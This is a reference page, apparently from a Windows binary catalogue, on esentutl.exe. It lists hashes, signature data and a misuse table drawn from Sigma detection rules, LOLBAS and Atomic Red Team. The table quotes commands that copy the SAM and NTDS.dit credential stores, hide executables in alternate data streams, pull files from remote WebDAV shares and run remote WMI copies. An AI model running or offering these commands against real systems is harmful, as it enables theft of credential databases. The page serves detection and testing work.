esentutl.exe

  • File Path: C:\Windows\SysWOW64\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type Hash
MD5 5F5105050FBE68E930486635C5557F84
SHA1 2D07C804E9EFE16DDA41619D9E5F5448E524BBED
SHA256 26D0A05D6AC8584440B3B771CF8BE4746E5F2BF19FFB118FD7C7DD551F61BA74
SHA384 2DCAEEF6FCFB20B584FBA8E88B5C938A6B1529C8ED07ADDCAC10E86488CD3FFE7F4C84AD636DD76FD1A25F4423CDB041
SHA512 80F9CFC5BB514871325B947AA534D4F868B141868E6BFCA9E5255EC758E88371FE4F7FA3CC3899019B79FBD6CA13E61CE7757179BC3FAA34F440AA155DA65CF8
SSDEEP 6144:fzAG0u8JLzbva/bv7caTZmxvnJwYKlK4KhOxZTfjr4fn:sG0LJLzbvazNToxKZcGZTjrGn
IMP F1C6F14D0CE10C71EBBD7A7E5EDDA3EF
PESHA1 E9142BDE071AE792A26AE52A41B2B0542F445810
PE256 2FDEEE9EE5D98439E247E0F09F75874B5C108DC214A9C2FAC9DEFD3496BB61A0

Runtime Data

Child Processes:

conhost.exe

Open Handles:

Path Type
(RW-) C:\Users\user File
(RW-) C:\Windows File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\esentutl.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/26d0a05d6ac8584440b3b771cf8be4746e5f2bf19ffb118fd7c7dd551f61ba74/detection

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image\|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image\|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit  
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe  
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe  
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/  
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.